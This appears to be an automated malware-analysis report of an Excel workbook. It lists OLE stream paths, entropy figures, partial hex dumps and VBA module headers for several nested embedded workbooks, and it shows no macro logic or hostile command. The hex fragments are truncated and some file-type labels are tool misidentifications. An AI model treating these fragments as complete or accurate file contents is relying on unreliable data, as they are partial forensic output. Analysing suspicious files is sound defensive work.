Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 d5 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 15 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] & g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 26 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 1e 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	MBD017EF322/_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 d5 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	200
Entropy:	3.268293668191049
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . 8 . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD017EF320/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD017EF320/\x1CompObj
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF320/Package, File Type: Microsoft Excel 2007+, Stream Size: 11564

General
Stream Path:	MBD017EF320/Package
File Type:	Microsoft Excel 2007+
Stream Size:	11564
Entropy:	7.132901381496351
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . o . . . L . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a2 c8 b4 f4 6f 01 00 00 4c 05 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF321/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD017EF321/\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF321/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	MBD017EF321/\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD017EF321/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327", Stream Size: 120200

General
Stream Path:	MBD017EF321/\x5SummaryInformation
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
Stream Size:	120200
Entropy:	4.560418312417174
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD017EF321/MBD017ED236/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD017EF321/MBD017ED236/\x1CompObj
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF321/MBD017ED236/Package, File Type: Microsoft Excel 2007+, Stream Size: 7880

General
Stream Path:	MBD017EF321/MBD017ED236/Package
File Type:	Microsoft Excel 2007+
Stream Size:	7880
Entropy:	6.5489983015138815
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF321/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 151951

General
Stream Path:	MBD017EF321/Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	151951
Entropy:	7.683490359133683
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD017EF321/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	520
Entropy:	5.18674908320575
Base64 Encoded:	True
Data ASCII:	I D = " { E 6 0 3 B E 4 9 - 3 B E 4 - 4 9 D 7 - 9 5 7 C - E 1 6 A B 7 6 4 E 9 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 2 2 0 2 4 C A 1 4 C E 1 4 C E 1
Data Raw:	49 44 3d 22 7b 45 36 30 33 42 45 34 39 2d 33 42 45 34 2d 34 39 44 37 2d 39 35 37 43 2d 45 31 36 41 42 37 36 34 45 39 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: MBD017EF321/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: MBD017EF321/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2615

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2615
Entropy:	3.966034925838034
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 85 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: MBD017EF321/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	MBD017EF321/_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	553
Entropy:	6.393413723460345
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc bb 86 65 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Stream Path: MBD017EF322/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD017EF322/\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD017EF322/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	MBD017EF322/\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD017EF322/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327", Stream Size: 120200

General
Stream Path:	MBD017EF322/\x5SummaryInformation
